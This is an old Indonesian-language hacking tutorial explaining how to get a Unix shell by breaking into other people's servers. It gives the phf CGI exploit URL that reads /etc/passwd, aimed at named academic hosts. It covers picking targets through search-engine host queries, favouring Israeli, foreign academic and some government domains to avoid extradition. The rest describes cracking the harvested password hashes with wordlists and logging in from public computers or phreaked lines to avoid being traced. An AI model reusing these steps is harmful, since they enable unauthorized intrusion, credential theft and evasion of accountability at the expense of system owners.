INSTANT SHELL UNIX

Berikut adalah cara mendapatkan shell unix dalam waktu cepat buat kamu
yang pingin belajar sambil praktek tapi nggak mampu beli/install UNIX dengan memanfaatkan eksploit yang udah cukup uzur cuman masih lumayan ampuh.

Bahan-bahan yang diperlukan:

- Web Browser (Netscape 3.0 disarankan karena cepat)
- Program Cracker (gunakan crackerjack atau star cracker)
- Daftar kata (Wordlist/Dictionary). Favorit gue sih GlobalKOS KOSdict.
Sekitar 11.2 MB uncompressed!
- Komputer UMUM (yang nggak bisa di-trace)
- Komputer nganggur (sekitar 6 jam untuk file passwd ukuran medium). untuk yang satu ini nggak mesti umum punya sebab fungsinya hanya untuk
meng-crack

Prakteknya:

- Jalankan browser di komputer umummu (perpustakaan, rental)
- buka window baru (kita sebut window #2)
- dari window lama (window #1) jalankan altavista
- cari target-target potensial. Untuk yang satu ini penjelasan sedikit:
Target yang paling empuk adalah site-site akademis. Paling lezat kalau
site-site akademis tsb terletak di luar negeri. Paling yahud yang ada di
negeri yahudi (israel) sebab Indonesia dan israel tidak punya hubungan
diplomatik maupun perjanjian deportasi. JANGAN coba-coba mengehack
server milik pemerintah Indonesia! Kalian nggak akan mendapat ampun! Nah, jika kamu sudah punya sesuatu dalam pemikiran,
contoh: site-site akademis di israel (domain= ac.il) maka
- di altavista, ada kolom yang berjudul "Search the web for ..." kamu isi
dengan: host:ac.il , lalu pilih "search"
- altavista akan menampilkan daftar server server yang memenuhi kriteria
search kamu. modifikasi sekeinginan hati. contoh: Untuk mendapatkan
daftar target dari domainnya universitas Tel Aviv, ketik host:tau.ac.il
kamu akan dapetin nama nama webserver yang ada di sono. jadi kira-kira
akan muncul webpage dari server yang namanya www.tau.ac.il,
www.cs.tau.ac.il dll. kalo kamu ngisi host:co.jp maka yang akan
ditampilin adalah host-host komersial di jepang (dlsb)
- pergilah ke Window #2. di kolom: "Location:" ketiklah :
http://nama.target.kamu/cgi-bin/phf?Qalias=x
/bin/cat%20/etc/passwd
jangan lupa mengganti nama target dengan salah satu site yang terdapat
di daftar sites kamu dari window #1
contoh:
http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x
/bin/cat%20/etc/passwd
(percuma ngegunain host yang ada di contoh, file passwdnya kecil
banget!)

- Kemungkinan ada empat:
1. Error message ... (dalam kasus ini, maka cukup kembali ke daftar
target dan coba target berikutnya.
2. Smile, you're on candid camera! (dalam kasus ini, informasi mengenai
kamu direkam, nomor ip dicatat dan akan disimpan di server!Hati-hati
sebab kamu udah di-log, dan bisa di-trace! Karena itu pakailah kondom
dan gunakan KOMPUTER UMUM!!!! dalam kasus ini kamu cuman bisa ngusep-ngusep dada aja, deh!)
3. muncul tulisan yang menyerupai bentuk dibawah:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: Bokeph Memendez:/usr/adm:/bin/bash
dll dll
perhatikan bahwa setelah tanda titik dua yang pertama, SELALU muncul
tanda asterisk (*). ini artinya kamu berhasil mendapatkan file passwd
hanya saja sayangnya sang file sudah di-shadow (nggak bisa dibaca
oleh sembarang orang, perlu pangkat ROOT (tuhan) untuk ngebacanya!)
Well, terpaksa lanjutkan ke daftar target berikutnya ....
4. muncul tulisan yang menyerupai bentuk dibawah:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
leonid:F5AymuqmXVFCU:1399:8:Leonid Bebek:/usr/leonid:/bin/tcsh
dll dll ... dll
(Dalam kasus ini : CREEET!!! Dapet deh tuh file passwd asli!- tanpa
shadow!!)
- Nah segera setelah file passwd didapatkan, "Save As" dan simpan di tempat yang aman!
- Terserah boleh kalo mau lanjutin ke target berikut atau segera meng-crack
- pastikan komputer untuk nge-crack aman dan bisa dibiarin nganggur selama berjamjam atau kalo file passwdnya emang besar, berhari hari.
- jalankan program crack, gunakan wordlist atas file passwd yang baru kamu panen.
- kalo udah berhasil nge-crack, kamu udah siap untuk memakai shell unix 'baru' mu! telnet aja ke servernya (jangan lupa pake komputer umum atau gunakan perlindungan (phreak dulu teleponnya, login ke isp pake punya orang, dll!!!)). Isi dengan login dan passwd yang baru kamu crack, silakan
lihat-lihat sekitar. Kalo ada info menarik, jangan lupa dibagi-bagi! jika kamu ingin mengeksploitasi, coba jalankan eksploit-eksploit yang ada untuk mendapatkan root! coba periksa http://www.k-elektronik.org/eksploit

Gimana? Gampang khan? kalo enggak bisa, sih , kebangetan banget! Gitu dulu deh! Semoga ada manfaatnya!

Catatan PENTING:
JUNJUNGLAH ETIKA HACKER!!!! Jangan merusak!!!
Jika kamu berhasil masuk (dan mendapatkan root). Jangan, sekali lagi
JANGAN jalankan perintah/program apapun yang kamu tidak tahu apa efeknya.
Pelajari bukumu, jalankan perintah-perintah sesuai petunjuk buku. JANGAN
coba-coba menjalankan eksploit tanpa tahu asal usul maupun pengertian
mendalam tentang UNIX. Tulisan ini gue tulis dengan maksud supaya kamu
bisa mendapatkan sarana untuk belajar UNIX sebab gue percaya bahwa
keinginan untuk belajar tidak sepantasnya dihalangi oleh faktor ekonomi.

Catatan 1:
File passwd yang kamu dapat masih dalam bentuk terenkripsi, jadi kalo
dilihat:

root:2/.,1wEYqm3m3Q:Root Account:/:/bin/csh
| |
nama account |
password terenkripsi/tersandi

cara kerja program cracker adalah kurang lebih seperti ini:

baca kata #1 dari file kamus/wordlist
enkripisi dengan algoritma DES
baca baris 1 dari file passwd (account 1), baca nama account dan passwd
terenkripsi
bandingkan apakah kata#1terenkripsi = passwd1terenkripsi
ya? beritahukan user/catat di log, tidak? baca baris2 file passwd, then.

catatan 2:
domain domain yang terkenal empuk:
ac.jp (akademis jepang)
ac.kr (akademis korea)
.edu (akademis amrik)
ac.uk (akademis inggris)
go.kr (pemerintah korea)
go.in (pemerintah india)
ac.ir (akademis iran)
com.il (komersil israel) ... dll ...dll